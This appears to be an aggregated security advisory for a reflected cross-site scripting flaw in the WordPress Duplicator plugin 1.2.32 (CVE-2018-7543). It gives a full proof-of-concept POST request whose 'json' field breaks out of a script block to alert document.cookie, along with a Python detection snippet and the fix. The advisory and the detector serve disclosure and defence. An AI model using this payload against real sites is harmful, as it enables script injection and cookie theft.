
WordPress Duplicator 1.2.32 Cross Site Scripting

Published: 15 Mar 2018
Reported by: Stefan Broeder
Type: packetstorm
Source: packetstormsecurity.com

A reflected cross-site scripting vulnerability in WordPress Duplicator 1.2.32 lets an attacker inject code that runs as arbitrary JavaScript in the victim's browser.

`# Exploit Title : Duplicator Wordpress Migration Plugin Reflected Cross Site Scripting (XSS)  
# Date: 25-02-2018   
# Exploit Author : Stefan Broeder  
# Contact : https://twitter.com/stefanbroeder  
# Vendor Homepage: https://snapcreek.com/  
# Software Link: https://wordpress.org/plugins/duplicator/  
# Version: 1.2.32  
# CVE : CVE-2018-7543  
# Category : webapps  
  
Description  
===========  
Duplicator is a WordPress plugin with more than 1 million active installations. Version 1.2.32 (and possibly previous versions) is affected by a reflected XSS vulnerability.  
  
Vulnerable part of code  
=======================  
File: duplicator/installer/build/view.step4.php:254 allows direct injection of $_POST variable 'json'.  
  
Impact  
======  
Arbitrary JavaScript code can be run in the browser if a user is tricked into clicking a link or browsing to a URL under the attacker's control.  
  
Proof of Concept  
============  
In order to exploit this vulnerability, an attacker has to send the following request to the server:  
  
POST /wp-content/plugins/duplicator/installer/build/view.step4.php HTTP/1.1  
Host: <hostname>  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cookie: wordpress_5c016e8f0f95f039102cbe8366c5c7f3=wp%7C1518599198<omissis>  
Connection: close  
Upgrade-Insecure-Requests: 1  
Pragma: no-cache  
Cache-Control: no-cache  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 91  
  
json='a';};document.write(alert(document.cookie));MyViewModel%3dfunction(){this.status%3d''  
  
The server replies as reported below:  
  
HTTP/1.1 200 OK  
Date: Mon, 12 Feb 2018 14:15:28 GMT  
Server: Apache/2.4.29 (Debian)  
Vary: Accept-Encoding  
Content-Length: 10224  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
...  
  
<script>  
MyViewModel = function() {  
this.status = 'a';};document.write(alert(document.cookie));MyViewModel=function(){this.status='';  
var errorCount = this.status.step2.query_errs || 0;  
(errorCount >= 1 )  
? $('#dup-step3-install-report-count').css('color', '#BE2323')  
: $('#dup-step3-install-report-count').css('color', '#197713')  
};  
ko.applyBindings(new MyViewModel());   
</script>  
  
Solution  
========  
  
Update to version 1.2.33  
  
`
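One way to triage captured requests (for example from a WAF or reverse-proxy body log) for the pattern in the proof of concept above, as an added example that is not part of the original advisory or of Duplicator's code. The path and the flagged body come from the advisory; the function names, the benign body and the `example.test` host are assumptions constructed for illustration.

```python
import json
from urllib.parse import unquote_plus, urlsplit

# Path from the advisory's proof-of-concept request.
TARGET_SUFFIX = "/wp-content/plugins/duplicator/installer/build/view.step4.php"

# Request body quoted in the advisory.
POC_BODY = ("json='a';};document.write(alert(document.cookie));"
            "MyViewModel%3dfunction(){this.status%3d''")
# Constructed benign body: {"step2":{"query_errs":0}}
BENIGN_BODY = "json=%7B%22step2%22%3A%7B%22query_errs%22%3A0%7D%7D"


def form_fields(body):
    """Decode a urlencoded body, splitting on '&' only; last value wins as in $_POST."""
    fields = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        fields[unquote_plus(name)] = unquote_plus(value)
    return fields


def classify(method, url, body):
    """Return 'ignore', 'ok' or 'suspicious' for one captured request."""
    if method.upper() != "POST" or not urlsplit(url).path.endswith(TARGET_SUFFIX):
        return "ignore"
    raw = form_fields(body).get("json")
    if raw is None:
        return "ok"
    if "</script" in raw.lower():
        return "suspicious"  # would close the script element even inside valid JSON
    try:
        value = json.loads(raw)
    except ValueError:
        return "suspicious"  # not JSON: echoed verbatim it becomes script source
    # The page script reads this.status.step2.query_errs, so an object is expected.
    return "ok" if isinstance(value, dict) else "suspicious"


if __name__ == "__main__":
    samples = [("POST", TARGET_SUFFIX, POC_BODY),
               ("POST", "http://example.test" + TARGET_SUFFIX, BENIGN_BODY),
               ("GET", "/wp-login.php", "")]
    for method, url, body in samples:
        print(method, url, "->", classify(method, url, body))
```

Any POST to this installer view on a production site is worth a look regardless of the verdict, and the fix remains the update to 1.2.33 named in the advisory.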

Vulners AI Score: 6.4 (Medium risk)
EPSS: 0.01419